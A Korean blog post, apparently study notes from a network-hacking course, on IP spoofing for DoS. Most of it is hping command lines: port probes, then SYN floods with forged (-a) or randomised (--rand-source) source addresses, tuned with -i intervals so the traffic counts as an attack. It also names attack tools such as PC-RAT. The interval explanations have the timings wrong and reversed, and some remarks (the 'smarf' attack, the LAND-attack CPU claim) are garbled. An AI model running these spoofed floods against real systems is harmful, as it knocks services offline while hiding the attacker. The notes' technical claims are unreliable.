딩굴댕굴

네트워크 해킹 - 08. IP Spoofing [작업중]

by jennysgap

BOX

IP spoofing 기술

 - DoS(DDoS), smarf Attack 등의 공격 시 공격자 정보를 감추기 위한 수단.

 - 주로 데이터를 송신하는 형태의 공격에서 많이 사용됨.

 - 공격 목표는 인터넷 구간에 존재하는 경우 효과적임.

 - 공격 도구 : netbot Attacker, hping, PC-RAT


# hping [-options] IP_address  : TCP를 이용한 ping 명령

# hping 192.168.3.xx

# hping -S 192.168.3.xx            : TCP syn 패킷을 이용한 ping 

# hping -S -p 22 192.168.3.xx  : 특정 포트 서비스 확인

# hping -1 192.168.3.xx             : ICMP 프로토콜을 이용한 ping

# hping -2 192.168.3.xx            : UDP 프로토콜을 이용한 ping

# hping -2 -p 22 192.168.3.xx  : 특정 포트 서비스 확인

# type hping

# type hping3


현재 이건 공격이 아님. 너무 느림 옵션을 붙여야 공격이 됨!!


smarf attack

LAND ATTack - cpu 중 i 가 들어간 것은 잘 안당한다. 그 전버전에 이용

Dos를 사용할 때, 핵심은 IP를 속여라!!!


<spoofing>

                    속일_IP     공격_IP

# hping -S -p 21 -a 192.168.3.X 192.168.3.XX  : -a로 내 IP를 속일 수 있음 (타겟2명)

# hping -S -p 21 192.168.3.XX --rand-source  : 1개 특정IP만 사용하면 추적올 수 있으니 임의IP로 찍으며 보냄. (타겟1명)


# hping -a 192.168.3.X 192.168.3.XX -S -p 21 -i u100 : 보내는 속도 조절 0.01초

# hping -a 192.168.3.X 192.168.3.XX -S -p 21 -i u1000 : 보내는 속도 조절 0.001초 **

# hping -a 192.168.3.X 192.168.3.XX -S -p 21 -i u10000 : 보내는 속도 조절 0.0001초

이정도는 되어야 DoS 공격이라고 할 수 있음






반응형

블로그의 정보

jennysgap

jennysgap

활동하기